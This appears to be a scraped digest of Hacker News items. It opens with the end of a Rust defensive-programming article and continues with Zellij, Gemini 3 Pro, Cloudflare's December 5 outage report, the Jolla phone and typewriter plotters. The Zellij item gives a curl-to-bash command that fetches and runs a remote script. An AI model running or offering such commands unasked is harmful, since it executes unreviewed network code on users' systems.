This way, the mutable variable is confined to the inner scope, making it clear that it’s only used for initialization. In case you use any temporary variables during initialization, they won’t leak into the outer scope. In our case above, there were none, but imagine if we had a temporary vector to hold intermediate results:

let data = {
    let mut data = get_vec();
    let temp = compute_something();
    data.extend(temp);
    data.sort();
    data  // Return the final value
};

Here, temp is only accessible within the inner scope, which prevents accidental use later on.

This is especially useful when you have multiple temporary variables during initialization that you don’t want accessible in the rest of the function. The scope makes it crystal clear that these variables are only meant for initialization.

Pattern: Defensively Handle Constructors

The following pattern is only truly helpful for libraries and APIs that need to be robust against future changes. In such a case, you want to ensure that all instances of a type are created through a constructor function that enforces validation logic; without that, future refactorings can easily lead to invalid states.

For application code, it’s probably best to keep things simple. You typically have all the call sites under control and can ensure that validation logic is always called.

Let’s say you have a simple type like the following:

pub struct S {
    pub field1: String,
    pub field2: u32,
}

Now you want to add validation logic to ensure invalid states are never created. One pattern is to return a Result from the constructor:

impl S {
    pub fn new(field1: String, field2: u32) -> Result<Self, String> {
        if field1.is_empty() {
            return Err("field1 cannot be empty".to_string());
        }
        if field2 == 0 {
            return Err("field2 cannot be zero".to_string());
        }
        Ok(Self { field1, field2 })
    }
}

But nothing stops someone from bypassing your validation by creating an instance directly:

let s = S {
    field1: "".to_string(),
    field2: 0,
};

This should not be possible! It is another implicit invariant that’s not enforced by the compiler: the validation logic is decoupled from struct construction. These are two separate operations that can be changed independently, and the compiler won’t complain.

To force external code to go through your constructor, add a private field:

pub struct S {
    pub field1: String,
    pub field2: u32,
    _private: (),  // This prevents external construction
}

impl S {
    pub fn new(field1: String, field2: u32) -> Result<Self, String> {
        if field1.is_empty() {
            return Err("field1 cannot be empty".to_string());
        }
        if field2 == 0 {
            return Err("field2 cannot be zero".to_string());
        }
        Ok(Self { field1, field2, _private: () })
    }
}

Now code outside your module cannot construct S directly because it cannot access the _private field. The compiler enforces that all construction must go through your new() method, which includes your validation logic!

Note that the underscore prefix is just a naming convention to indicate the field is intentionally unused; it’s the lack of pub that makes it private and prevents external construction.

For libraries that need to evolve over time, you can also use the #[non_exhaustive] attribute instead:

#[non_exhaustive]
pub struct S {
    pub field1: String,
    pub field2: u32,
}

This has the same effect of preventing construction outside your crate, but also signals to users that you might add more fields in the future. The compiler will prevent them from using struct literal syntax, forcing them to use your constructor.

There’s a big difference between these two approaches:

  • #[non_exhaustive] only works across crate boundaries. It prevents construction outside your crate.
  • _private works at the module boundary. It prevents construction outside the module, even within the same crate.

On top of that, some developers find _private: () more explicit about intent: “this struct has a private field that prevents construction.”

With #[non_exhaustive] , the primary intent is signaling that fields might be added in the future, and preventing construction is more of a side effect.

But what about code within the same module ? With the patterns above, code in the same module can still bypass your validation:

// Still compiles in the same module!
let s = S {
    field1: "".to_string(),
    field2: 0,
    _private: (),
};

Rust’s privacy works at the module level, not the type level. Anything in the same module can access private items.

If you need to enforce constructor usage even within your own module, you need a more defensive approach using nested private modules:

mod inner {
    pub struct S {
        pub field1: String,
        pub field2: u32,
        _seal: Seal,
    }
    
    // This type is private to the inner module
    struct Seal;
    
    impl S {
        pub fn new(field1: String, field2: u32) -> Result<Self, String> {
            if field1.is_empty() {
                return Err("field1 cannot be empty".to_string());
            }
            if field2 == 0 {
                return Err("field2 cannot be zero".to_string());
            }
            Ok(Self { field1, field2, _seal: Seal })
        }
    }
}

// Re-export for public use
pub use inner::S;

Now even code in your outer module cannot construct S directly because Seal is trapped in the private inner module. Only the new() method, which lives in the same module as Seal , can construct it. The compiler guarantees that all construction, even internal construction, goes through your validation logic.

The public fields can still be mutated directly, though:

let mut s = S::new("valid".to_string(), 42).unwrap();
s.field1 = "".to_string(); // Still possible to mutate fields directly

To prevent that, you can make the fields private and provide getter methods instead:

mod inner {
    pub struct S {
        field1: String,
        field2: u32,
        _seal: Seal,
    }
    
    struct Seal;
    
    impl S {
        pub fn new(field1: String, field2: u32) -> Result<Self, String> {
            if field1.is_empty() {
                return Err("field1 cannot be empty".to_string());
            }
            if field2 == 0 {
                return Err("field2 cannot be zero".to_string());
            }
            Ok(Self { field1, field2, _seal: Seal })
        }

        pub fn field1(&self) -> &str {
            &self.field1
        }

        pub fn field2(&self) -> u32 {
            self.field2
        }
    }
}

Now the only way to create an instance of S is through the new() method, and the only way to access its fields is through the getter methods.

When to Use Each

To enforce validation through constructors:

  • For external code: Add a private field like _private: () or use #[non_exhaustive]
  • For internal code: Use nested private modules with a private “seal” type
  • Choose based on your needs: Most code only needs to prevent external construction; forcing internal construction is more defensive but also more complex

The key insight is that by making construction impossible without access to a private type, you turn your validation logic from a convention into a guarantee enforced by the compiler. So let’s put that compiler to work!

Pattern: Use #[must_use] on Important Types

The #[must_use] attribute is often neglected. That’s sad, because it’s such a simple yet powerful mechanism to prevent callers from accidentally ignoring important return values.

#[must_use = "Configuration must be applied to take effect"]
pub struct Config {
     ...
}

impl Config {
    pub fn new() -> Self {
            }

    pub fn with_timeout(mut self, timeout: Duration) -> Self {
        self.timeout = timeout;
        self
    }
}

Now if someone creates a Config but forgets to use it, the compiler will warn them (even with a custom message!):

let config = Config::new();
// Warning on the next line: the returned Config is unused
// ("Configuration must be applied to take effect")
config.with_timeout(Duration::from_secs(30));

// Correct usage:
let config = Config::new()
    .with_timeout(Duration::from_secs(30));
apply_config(config);

This is especially useful for guard types that need to be held for their lifetime and results from operations that must be checked. The standard library uses this extensively. For example, Result is marked with #[must_use] , which is why you get warnings if you don’t handle errors.
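Guard types are a good illustration. Here’s a hypothetical sketch (the SpanGuard type and the printlns are made up for illustration):

#[must_use = "the span ends as soon as the guard is dropped"]
pub struct SpanGuard {
    name: String,
}

impl Drop for SpanGuard {
    fn drop(&mut self) {
        println!("span `{}` ended", self.name);
    }
}

pub fn enter_span(name: &str) -> SpanGuard {
    println!("span `{}` started", name);
    SpanGuard { name: name.to_string() }
}

fn main() {
    enter_span("request"); // Warning: the guard is dropped immediately

    let _guard = enter_span("request"); // Correct: lives until end of scope
}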

Code Smell: Boolean Parameters

Boolean parameters make code hard to read at the call site and are error-prone. We all know the scenario where we’re sure this will be the last boolean parameter we’ll ever add to a function.

// Too many boolean parameters
fn process_data(data: &[u8], compress: bool, encrypt: bool, validate: bool) {
    /* ... */
}

// At the call site, what do these booleans mean?
process_data(&data, true, false, true);  // What does this do?

It’s impossible to understand what this code does without looking at the function signature. Even worse, it’s easy to accidentally swap the boolean values.

Instead, use enums to make the intent explicit:

enum Compression {
    Strong,
    Medium,
    None,
}

enum Encryption {
    AES,
    ChaCha20,
    None,
}

enum Validation {
    Enabled,
    Disabled,
}

fn process_data(
    data: &[u8],
    compression: Compression,
    encryption: Encryption,
    validation: Validation,
) {
    /* ... */
}

// Now the call site is self-documenting
process_data(
    &data,
    Compression::Strong,
    Encryption::None,
    Validation::Enabled
);

This is much more readable, and the compiler will catch mistakes if you pass the wrong enum type. Notice that the enum variants can be more descriptive than just true or false. And more often than not, there are more than two meaningful options, especially in programs that grow over time.

For functions with many options, you can configure them using a parameter struct:

struct ProcessDataParams {
    compression: Compression,
    encryption: Encryption,
    validation: Validation,
}

impl ProcessDataParams {
    // Common configurations as constructor methods
    pub fn production() -> Self {
        Self {
            compression: Compression::Strong,
            encryption: Encryption::AES,
            validation: Validation::Enabled,
        }
    }

    pub fn development() -> Self {
        Self {
            compression: Compression::None,
            encryption: Encryption::None,
            validation: Validation::Enabled,
        }
    }
}

fn process_data(data: &[u8], params: ProcessDataParams) {
    /* ... */
}

// Usage with preset configurations
process_data(&data, ProcessDataParams::production());

// Or customize for specific needs
process_data(&data, ProcessDataParams {
    compression: Compression::Medium,
    encryption: Encryption::ChaCha20,
    validation: Validation::Enabled, 
});

This approach scales much better as your function evolves. Adding new parameters doesn’t break existing call sites, and you can easily add defaults or make certain fields optional. The preset methods also document common use cases and make it easy to use the right configuration for different scenarios.

Rust is often criticized for not having named parameters, but using a parameter struct is arguably even better for larger functions with many options.

Clippy Lints for Defensive Programming

Many of these patterns can be enforced automatically using Clippy lints. Here are the most relevant ones:

  • clippy::indexing_slicing: Prevents direct indexing into slices and vectors.
  • clippy::fallible_impl_from: Warns about From implementations that can panic and should be TryFrom instead.
  • clippy::wildcard_enum_match_arm: Disallows wildcard _ patterns.
  • clippy::unneeded_field_pattern: Identifies when you’re ignoring too many struct fields with .. unnecessarily.
  • clippy::fn_params_excessive_bools: Warns when a function has too many boolean parameters (4 or more by default).
  • clippy::must_use_candidate: Suggests adding #[must_use] to types that are good candidates for it.

You can enable these in your project by adding them at the top of your crate, e.g.

#![deny(clippy::indexing_slicing)]
#![deny(clippy::fallible_impl_from)]
#![deny(clippy::wildcard_enum_match_arm)]
#![deny(clippy::unneeded_field_pattern)]
#![deny(clippy::fn_params_excessive_bools)]
#![deny(clippy::must_use_candidate)]

Or in your Cargo.toml :

[lints.clippy]
indexing_slicing = "deny"
fallible_impl_from = "deny"
wildcard_enum_match_arm = "deny"
unneeded_field_pattern = "deny"
fn_params_excessive_bools = "deny"
must_use_candidate = "deny"

Conclusion

Defensive programming in Rust is about leveraging the type system and compiler to catch bugs before they happen. By following these patterns, you can:

  • Make implicit invariants explicit and compiler-checked
  • Future-proof your code against refactoring mistakes
  • Reduce the surface area for bugs

It’s a skill that doesn’t come naturally and it’s not covered in most Rust books, but knowing these patterns can make the difference between code that works but is brittle, and code that is robust and maintainable for years to come.

Remember: if you find yourself writing // this should never happen , take a step back and ask how the compiler could enforce that invariant for you instead. The best bug is the one that never compiles in the first place.

Zellij: A terminal workspace with batteries included

Hacker News
zellij.dev
2025-12-05 16:18:58
Comments...
Original Article


A terminal workspace with batteries included

Try Zellij Without Installing

For bash/zsh: bash <(curl -L https://zellij.dev/launch)
For fish: bash (curl -L https://zellij.dev/launch | psub)

View the script that will be executed here



Gemini 3 Pro: the frontier of vision AI

Hacker News
blog.google
2025-12-05 16:15:10
Comments...
Original Article

Gemini 3 Pro delivers state-of-the-art performance across document, spatial, screen and video understanding.


Gemini 3 Pro represents a generational leap from simple recognition to true visual and spatial reasoning. It is our most capable multimodal model ever, delivering state-of-the-art performance across document, spatial, screen and video understanding.

This model sets new highs on vision benchmarks such as MMMU Pro and Video MMMU for complex visual reasoning, as well as use-case-specific benchmarks across document, spatial, screen and long video understanding.

Vision AI benchmarks table

1. Document understanding

Real-world documents are messy, unstructured, and difficult to parse — often filled with interleaved images, illegible handwritten text, nested tables, complex mathematical notation and non-linear layouts. Gemini 3 Pro represents a major leap forward in this domain, excelling across the entire document processing pipeline — from highly accurate Optical Character Recognition (OCR) to complex visual reasoning.

Intelligent perception

To truly understand a document, a model must accurately detect and recognize text, tables, math formulas, figures and charts regardless of noise or format.

A fundamental capability is "derendering" — the ability to reverse-engineer a visual document back into structured code (HTML, LaTeX, Markdown) that would recreate it. As illustrated below, Gemini 3 demonstrates accurate perception across diverse modalities including converting an 18th-century merchant log into a complex table, or transforming a raw image with mathematical annotation into precise LaTeX code.

Example 1: Handwritten Complex Table from 18th century Albany Merchant’s Handbook ( HTML transcription )

Example 2: Reconstructing equations from an image

Example 3: Reconstructing Florence Nightingale's original Polar Area Diagram into an interactive chart (with a toggle!)

Sophisticated reasoning

Users can rely on Gemini 3 to perform complex, multi-step reasoning across tables and charts — even in long reports. In fact, the model notably outperforms the human baseline on the CharXiv Reasoning benchmark (80.5%).

To illustrate this, imagine a user analyzing the 62-page U.S. Census Bureau “Income in the United States: 2022” report with the following prompt: “Compare the 2021–2022 percent change in the Gini index for "Money Income" versus "Post-Tax Income", and what caused the divergence in the post-tax measure, and in terms of "Money Income", does it show the lowest quintile's share rising or falling?”

Swipe through the images below to see the model's step-by-step reasoning.

Visual Extraction: To answer the Gini Index Comparison question, Gemini located and cross-referenced this info in Figure 3 about “Money Income decreased by 1.2 percent” and in Table B-3 about “Post-Tax Income increased by 3.2 percent”

Causal Logic: Crucially, Gemini 3 does not stop at the numbers; it correlates this gap with the text’s policy analysis, correctly identifying the lapse of ARPA policies and the end of stimulus payments as the main causes.

Numerical Comparison: To determine whether the lowest quintile’s share was rising or falling, Gemini 3 looked at Table A-3, compared the numbers 2.9 and 3.0, and concluded that “the share of aggregate household income held by the lowest quintile was rising.”

2. Spatial understanding

Gemini 3 Pro is our strongest spatial understanding model so far. Combined with its strong reasoning, this enables the model to make sense of the physical world.

  • Pointing capability: Gemini 3 has the ability to point at specific locations in images by outputting pixel-precise coordinates. Sequences of 2D points can be strung together to perform complex tasks, such as estimating human poses or reflecting trajectories over time.
  • Open vocabulary references: Gemini 3 identifies objects and their intent using an open vocabulary. The most direct application is robotics: the user can ask a robot to generate spatially grounded plans like, “Given this messy table, come up with a plan on how to sort the trash.” This also extends to AR/XR devices, where the user can request an AI assistant to “Point to the screw according to the user manual.”

3. Screen understanding

Gemini 3.0 Pro’s spatial understanding really shines through its screen understanding of desktop and mobile OS screens. This reliability helps make computer use agents robust enough to automate repetitive tasks. UI understanding capabilities can also enable tasks like QA testing, user onboarding and UX analytics. The following computer use demo shows the model perceiving and clicking with high precision.

4. Video understanding

Gemini 3 Pro takes a massive leap forward in how AI understands video, the most complex data format we interact with. It is dense, dynamic, multimodal and rich with context.

  1. High frame rate understanding: We have optimized the model to be much stronger at understanding fast-paced actions when sampling at >1 frames-per-second. Gemini 3 Pro can capture rapid details — vital for tasks like analyzing golf swing mechanics.

By processing video at 10 FPS—10x the default speed—Gemini 3 Pro catches every swing and shift in weight, unlocking deep insights into player mechanics.

2. Video reasoning with “thinking” mode: We upgraded "thinking" mode to go beyond object recognition toward true video reasoning. The model can now better trace complex cause-and-effect relationships over time. Instead of just identifying what is happening, it understands why it is happening.

3. Turning long videos into action: Gemini 3 Pro bridges the gap between video and code. It can extract knowledge from long-form content and immediately translate it into functioning apps or structured code.

5. Real-world applications

Here are a few ways we think various fields will benefit from Gemini 3’s capabilities.

Education

Gemini 3.0 Pro’s enhanced vision capabilities drive significant gains in the education field, particularly for diagram-heavy questions central to math and science. It successfully tackles the full spectrum of multimodal reasoning problems found from middle school through post-secondary curriculums. This includes visual reasoning puzzles (like Math Kangaroo ) and complex chemistry and physics diagrams.

Gemini 3’s visual intelligence also powers the generative capabilities of Nano Banana Pro . By combining advanced reasoning with precise generation, the model, for example, can help users identify exactly where they went wrong in a homework problem.

Prompt: “Here is a photo of my homework attempt. Please check my steps and tell me where I went wrong. Instead of explaining in text, show me visually on my image.” (Note: Student work is shown in blue; model corrections are shown in red). [ See prompt in Google AI Studio ]

Image showing input of a handwritten equation on the left and the model's correction annotated on top of the handwritten equation

Medical and biomedical imaging

Gemini 3 Pro stands as our most capable general model for medical and biomedical imagery understanding, achieving state-of-the-art performance across major public benchmarks: MedXpertQA-MM (a difficult expert-level medical reasoning exam), VQA-RAD (radiology imagery Q&A) and MicroVQA (a multimodal reasoning benchmark for microscopy-based biological research).

Input image from MicroVQA - a benchmark for microscopy-based biological research

Image showing a stained kidney cortex image on the left and the model prompt and response on the right

Law and finance

Gemini 3 Pro’s enhanced document understanding helps professionals in finance and law tackle highly complex workflows. Finance platforms can seamlessly analyze dense reports filled with charts and tables, while legal platforms benefit from the model's sophisticated document reasoning.

6. Media resolution control

Gemini 3 Pro improves the way it processes visual inputs by preserving the native aspect ratio of images. This drives significant quality improvements across the board.

Additionally, developers gain granular control over performance and cost via the new media_resolution parameter. This allows you to tune visual token usage to balance fidelity against consumption:

  • High resolution: Maximizes fidelity for tasks requiring fine detail, such as dense OCR or complex document understanding.
  • Low resolution: Optimizes for cost and latency on simpler tasks, such as general scene recognition or long-context tasks.

For specific recommendations, refer to our Gemini 3.0 Documentation Guide .

Build with Gemini 3 Pro

We are excited to see what you build with these new capabilities. To get started, check out our developer documentation or play with the model in Google AI Studio today.

I'm Peter Roberts, immigration attorney who does work for YC and startups. AMA

Hacker News
news.ycombinator.com
2025-12-05 16:04:20
Comments...
Original Article

Hi Peter, thanks for doing the AMA! I have a Delaware registered LLC (10 years old), I managed to get even an EIN remotely. However, I can't open a bank account remotely and so I have just been paying the registered agent fees and Delaware gov taxes for the LLC all these years. I however, genuinely want to come to the states to open the bank account and actually expand my business into the US. The LLC hasn't really had any meetings/etc. but taxes are paid. How do I use my LLC to apply for a B1/B2 to visit the US?

OR should I just close it and try the normal route? Thanks in advance!

Framework Laptop 13 gets ARM processor with 12 cores via upgrade kit

Hacker News
www.notebookcheck.net
2025-12-05 15:49:56
Comments...
Original Article
The Framework Laptop 13 can now be equipped with an ARM processor (Image source: Notebookcheck)

The Framework Laptop 13 has a replaceable mainboard, which means that the processor can be easily upgraded after purchase. While Framework itself only offers Intel and AMD CPUs, a mainboard with a high-performance ARM processor from a third-party manufacturer has now launched.

The Qualcomm Snapdragon X Plus and Snapdragon X Elite have proven that ARM processors have earned a place in the laptop market, as devices like the Lenovo IdeaPad Slim 5 stand out with their long battery life and an affordable price point.

MetaComputing is now offering an alternative to Intel, AMD and the Snapdragon X series. Specifically, the company has introduced a mainboard that can be installed in the Framework Laptop 13 or in a mini PC case. This mainboard is equipped with a CIX CP8180 ARM chipset, which is also found inside the Minisforum MS-R1. The processor has a total of eight ARM Cortex-A720 performance cores, the two fastest of which can hit boost clock speeds of up to 2.6 GHz. Moreover, there are four Cortex-A520 efficiency cores.

The mainboard can be installed in the Framework Laptop 13 or a mini PC case (Image source: MetaComputing)

Additionally, there’s an ARM Immortalis-G720 GPU with ten cores and an AI accelerator with a performance of 30 TOPS. This chipset is likely slower than the Snapdragon X Elite or a current flagship smartphone chip, but it should still provide enough performance for many everyday tasks. Either way, this mainboard upgrade will mostly be of interest to developers, because early tests show that the SoC already draws about 16 watts at idle, which means battery life will likely be fairly short when combined with the 55 Wh battery of the Framework Laptop 13.

Price and availability

The MetaComputing ARM AI PC Kit is available now at the manufacturer’s official online shop . The base model with 16GB RAM, 1TB SSD and a mini PC case costs $549. The mainboard can be installed in a previously purchased Framework Laptop 13. Users who don’t own a Framework Laptop can order a bundle including the notebook for $999. MetaComputing charges an additional $100 for 32GB RAM. Shipping is free worldwide, but these list prices do not include import fees or taxes.


Hannes Brecher, 2025-12-04 (Update: 2025-12-04)

Cloudflare outage on December 5, 2025

Hacker News
blog.cloudflare.com
2025-12-05 15:35:43
Comments...
Original Article

2025-12-05

5 min read

On December 5, 2025, at 08:47 UTC (all times in this blog are UTC), a portion of Cloudflare’s network began experiencing significant failures. The incident was resolved at 09:12 (~25 minutes total impact), when all services were fully restored.

A subset of customers were impacted, accounting for approximately 28% of all HTTP traffic served by Cloudflare. Several factors needed to combine for an individual customer to be affected as described below.

The issue was not caused, directly or indirectly, by a cyber attack on Cloudflare’s systems or malicious activity of any kind. Instead, it was triggered by changes being made to our body parsing logic while attempting to detect and mitigate an industry-wide vulnerability disclosed this week in React Server Components.

Any outage of our systems is unacceptable, and we know we have let the Internet down again following the incident on November 18. We will be publishing details next week about the work we are doing to stop these types of incidents from occurring.

What happened

The graph below shows HTTP 500 errors served by our network during the incident timeframe (red line at the bottom), compared to unaffected total Cloudflare traffic (green line at the top).

500 error codes served by Cloudflare’s network during the incident

Cloudflare's Web Application Firewall (WAF) provides customers with protection against malicious payloads, allowing them to be detected and blocked. To do this, Cloudflare’s proxy buffers HTTP request body content in memory for analysis. Before today, the buffer size was set to 128KB.

As part of our ongoing work to protect customers using React against a critical vulnerability, CVE-2025-55182 , we started rolling out an increase to our buffer size to 1MB, the default limit allowed by Next.js applications. We wanted to make sure as many customers as possible were protected.

This change was being rolled out using our gradual deployment system, and, as part of this rollout, we identified an increase in errors in one of our internal tools which we use to test and improve new WAF rules. As this was an internal tool, and the fix being rolled out was a security improvement, we decided to disable the tool for the time being as it was not required to serve or protect customer traffic.

Disabling this was done using our global configuration system. This system does not use gradual rollouts but rather propagates changes within seconds to the entire network and is under review following the outage we recently experienced on November 18 .

In the FL1 version of our proxy, under certain circumstances, this latter change caused an error state that resulted in HTTP 500 error codes being served from our network.

As soon as the change propagated to our network, code execution in our FL1 proxy reached a bug in our rules module, which led to the following Lua exception:

[lua] Failed to run module rulesets callback late_routing: /usr/local/nginx-fl/lua/modules/init.lua:314: attempt to index field 'execute' (a nil value)

resulting in HTTP code 500 errors being issued.

The issue was identified shortly after the change was applied, and was reverted at 09:12, after which all traffic was served correctly.

Customers that have their web assets served by our older FL1 proxy AND had the Cloudflare Managed Ruleset deployed were impacted. All requests for websites in this state returned an HTTP 500 error, with the small exception of some test endpoints such as /cdn-cgi/trace .

Customers that did not have the configuration above applied were not impacted. Customer traffic served by our China network was also not impacted.

The runtime error

Cloudflare’s rulesets system consists of sets of rules which are evaluated for each request entering our system. A rule consists of a filter, which selects some traffic, and an action which applies an effect to that traffic. Typical actions are “ block ”, “ log ”, or “ skip ”. Another type of action is “ execute ”, which is used to trigger evaluation of another ruleset.

Our internal logging system uses this feature to evaluate new rules before we make them available to the public. A top level ruleset will execute another ruleset containing test rules. It was these test rules that we were attempting to disable.

We have a killswitch subsystem as part of the rulesets system which is intended to allow a rule which is misbehaving to be disabled quickly. This killswitch system receives information from our global configuration system mentioned in the prior sections. We have used this killswitch system on a number of occasions in the past to mitigate incidents and have a well-defined Standard Operating Procedure, which was followed in this incident.

However, we have never before applied a killswitch to a rule with an action of “ execute ”. When the killswitch was applied, the code correctly skipped the evaluation of the execute action, and didn’t evaluate the sub-ruleset pointed to by it. However, an error was then encountered while processing the overall results of evaluating the ruleset:

if rule_result.action == "execute" then
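  -- Note: when the killswitch skips an "execute" rule, rule_result.execute
  -- is nil, so the line below indexes a nil value and raises an error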
  rule_result.execute.results = ruleset_results[tonumber(rule_result.execute.results_index)]
end

This code expects that, if the rule has action="execute", the rule_result.execute object will exist. However, because the rule had been skipped, the rule_result.execute object did not exist, and Lua raised an error when attempting to index a nil value.

This is a straightforward error in the code, which had existed undetected for many years. This type of code error is prevented by languages with strong type systems. In our replacement for this code in our new FL2 proxy, which is written in Rust, the error did not occur.
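To illustrate, here’s a hypothetical Rust sketch of the same logic (not Cloudflare’s actual FL2 code): modelling the “execute” payload as an Option forces the skipped-rule case to be handled explicitly.

struct ExecuteResult {
    results_index: usize,
    results: Option<Vec<String>>,
}

struct RuleResult {
    action: String,
    execute: Option<ExecuteResult>,
}

fn attach_results(rule_result: &mut RuleResult, ruleset_results: &[Vec<String>]) {
    if rule_result.action == "execute" {
        // The compiler forces a decision about the None case (the rule was
        // skipped by the killswitch); there is no nil value to index by accident.
        if let Some(execute) = rule_result.execute.as_mut() {
            execute.results = ruleset_results.get(execute.results_index).cloned();
        }
    }
}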

What about the changes being made after the incident on November 18, 2025?

We made an unrelated change that caused a similar, longer availability incident two weeks ago on November 18, 2025. In both cases, a deployment to help mitigate a security issue for our customers propagated to our entire network and led to errors for nearly all of our customer base.

We have spoken directly with hundreds of customers following that incident and shared our plans to make changes to prevent single updates from causing widespread impact like this. We believe these changes would have helped prevent the impact of today’s incident but, unfortunately, we have not finished deploying them yet.

We know it is disappointing that this work has not been completed yet. It remains our first priority across the organization. In particular, the projects outlined below should help contain the impact of these kinds of changes:

  • Enhanced Rollouts & Versioning : Similar to how we slowly deploy software with strict health validation, data used for rapid threat response and general configuration needs to have the same safety and blast mitigation features. This includes health validation and quick rollback capabilities among other things.

  • Streamlined break glass capabilities: Ensure that critical operations can still be achieved in the face of additional types of failures. This applies to internal services as well as all standard methods of interaction with the Cloudflare control plane used by all Cloudflare customers.

  • "Fail-Open" Error Handling: As part of the resilience effort, we are replacing the incorrectly applied hard-fail logic across all critical Cloudflare data-plane components. If a configuration file is corrupt or out-of-range (e.g., exceeding feature caps), the system will log the error and default to a known-good state or pass traffic without scoring, rather than dropping requests. Some services will likely give the customer the option to fail open or closed in certain scenarios. This will include drift-prevention capabilities to ensure this is enforced continuously.

Before the end of next week we will publish a detailed breakdown of all the resiliency projects underway, including the ones listed above. While that work is underway, we are locking down all changes to our network in order to ensure we have better mitigation and rollback systems before we begin again.

These kinds of incidents, and how closely they are clustered together, are not acceptable for a network like ours. On behalf of the team at Cloudflare we want to apologize for the impact and pain this has caused again to our customers and the Internet as a whole.

Timeline

Time (UTC)  Status             Description
08:47       INCIDENT start     Configuration change deployed and propagated to the network
08:48       Full impact        Change fully propagated
08:50       INCIDENT declared  Automated alerts
09:11       Change reverted    Configuration change reverted and propagation started
09:12       INCIDENT end       Revert fully propagated, all traffic restored



Jolla Phone Pre-Order

Hacker News
commerce.jolla.com
2025-12-05 15:15:12
Comments...
Original Article

Performance Meets Privacy

  • 5G with dual nano-SIM
  • 12GB RAM and 256GB storage expandable up to 2TB
  • Sailfish OS 5
  • Support for Android apps with Jolla AppSupport
  • User replaceable back cover with colour options
  • User replaceable battery
  • Physical Privacy Switch

Privacy by Design

  • No tracking, no calling home, no hidden analytics
  • User configurable physical Privacy Switch: turn off your microphone, Bluetooth, Android apps, or whatever you wish

Scandinavian styling in its pure form

  • Honouring the original Jolla Phone form factor and design
  • Replaceable back cover
  • Available in three distinct colours inspired by Nordic nature

Available in distinct user replaceable colours

  • Snow White
  • Kaamos Black
  • The Orange

An Independent Linux Phone

A successor to the iconic original Jolla Phone from 2013, brought to 2026 with modern specs while honouring the Jolla heritage design. And faster, smoother, more capable than the current Jolla C2.

A phone you can actually daily-drive. Still Private. Still Yours.

Defined together with the Community

Over the past months, Sailfish OS community members voted on what the next Jolla device should be: its key characteristics, specifications and features.

Based on community voting and real user needs, this device has only one mission:

Put control back in your hands.

KEY BENEFITS OF PRE-ORDERING

Special Edition Back Cover — Pre-order batch only

Made as a thank-you to early supporters

Directly contribute in making the product a reality

  • Community Voice, Real Device: The questionnaire received an overwhelming flow of input, and this project captures it
  • Now it is time to act! Your pre-order determines whether the project becomes reality
  • Built for Longevity

    Sailfish OS is proven to outlive mainstream support cycles. Long-term OS support, guaranteed for a minimum of 5 years. Incremental updates, and no forced obsolescence.

  • Your Phone Shouldn’t Spy on You

    Mainstream phones send vast amounts of background data. A common Android phone sends megabytes of data per day to Google even if the device is not used at all.

    Sailfish OS stays silent unless you explicitly allow connections.

DIT: DO IT TOGETHER

This isn’t your regular smartphone project.

It’s a community mission.

  • You voted on the device
  • You guided its specs and definition
  • You shaped the philosophy
  • And now you help bring it to life

Every pre-order helps make production a reality.

Our Community

TECH SPECS

  • SoC: High-performance MediaTek 5G platform
  • RAM: 12GB
  • Storage: 256GB + expandable with microSDXC
  • Cellular: 4G + 5G with dual nano-SIM and global roaming modem configuration
  • Display: 6.36” ~390ppi FullHD AMOLED, aspect ratio 20:9, Gorilla Glass
  • Cameras: 50MP Wide + 13MP Ultrawide main cameras, front facing wide-lens selfie camera
  • Battery: approx. 5,500mAh, user replaceable
  • Connectivity: WiFi 6, BT 5.4, NFC
  • Dimensions: ~158 x 74 x 9mm
  • Other: Power key fingerprint reader, user changeable backcover, RGB indication LED, Privacy Switch

Technical specification subject to final confirmation upon final payment and manufacturing. Minor alterations may apply.

FAQ

Why a pre-order system?

Because this is a community-funded device, we need committed pre-orders to turn the designs into a full product program and commit to ordering the first production batch. If we reach 2,000 units we start the full product program. If not, you get a full refund.

Is the 99 € refundable?

Yes. Fully.

What is the normal price of the product, and do I get a discount by pre-ordering?

The final price of the product is not set yet, but we estimate it will settle between 599€ and 699€ (incl. your local VAT). The final price depends on confirmation of the final specification and the bill of materials, which happens in due course during the product program. Memory component prices in particular have been exceptionally volatile this year.

By pre-ordering you confirm your special price of 499€ in total.

Can I cancel anytime?

Yes.

Is this phone real or just a concept?

It is real. Definition and real electro-mechanical design are underway, based on the community voting. To turn the designs into a full product program and commit to ordering the first batch, we need a minimum of 2,000 committed pre-orders.

When will full specs be available?

Once the manufacturing pathway is confirmed at 2,000 pre-orders.

Will there be accessories, like a spare battery and protective case?

Yes, there will be. We’ll make those available in due course during the project.

When will the phone ship?

Estimated by the end of 1H/2026.

Will the Jolla Phone work outside Europe, can I use it e.g. in the U.S.?

Yes, we will design the cellular band configuration to enable global travel as much as possible, including e.g. roaming on U.S. carrier networks.

Can I buy the Jolla Phone if I’m outside Europe, can I use it e.g. in the U.S.?

The initial sales markets are the EU, UK, Switzerland and Norway. Entering other markets, such as the U.S. and Canada, will be decided in due course based on potential interest from those areas.

We will design the cellular band configuration to enable potential future markets, including major U.S. carrier networks.

Typewriter plotters

Lobsters
biosrhythm.com
2025-12-05 15:07:51
Comments...
Original Article

Did you know there were typewriters that used ball point pens to draw not just text but also graphics? I’ve collected several of these over the years. Read on to discover a world that you didn’t know existed.

Typewriter plotters could act as a normal typewriter in that you could type on the keys and have the text printed on the page. The difference is that it would use a tiny ball point pen to “draw” the text, character by character, onto the page. It’s mesmerizing to watch! Many also included the ability to print graphs and bar charts, although in practice it was likely cumbersome. In addition, some models had the ability to connect to a computer to print text or even custom graphics.

Panasonic RK-P400C Penwriter

Panasonic made three models. The top-shelf model was the RK-P400C Penwriter, which included a built-in RS-232 port for computer control. It also came with a white pen for error correcting.

Here’s a video of the Panasonic RK-P400C Penwriter typewriter plotter drawing a design under computer control via RS-232. The manual is available from Archive.org .

Mona Triangles on a Panasonic RK-P400C typewriter plotter.

Panasonic RK-P440 Penwriter

A lower end model was the Panasonic RK-P440 Penwriter. It had a computer input but required the K100 external interface. Otherwise functionally the same: draws texts as well as business graphics with 4 color ballpoint pens. Portable using 6 C batteries.

The Panasonic K-100 interface box connected to the typewriter via a DE-9 port on the side and connected to your computer via either DB-25 RS-232 or Centronics parallel.

Here’s a video of the Panasonic RK-P440 Penwriter plotting the demo page using four ballpoint pens.

Panasonic RK-P200C Penwriter

Panasonic also had the basic RK-P200C Penwriter which removed any computer control but kept the ability to do standalone business graphics. Pic from eBay.

Silver Reed EB50

There were other ballpoint-pen-based typewriters, such as this Silver Reed EB50 . It draws text and business graphics too, but this one has a parallel port so it can act as a plotter. I added support for it to my workflow and it works very well.

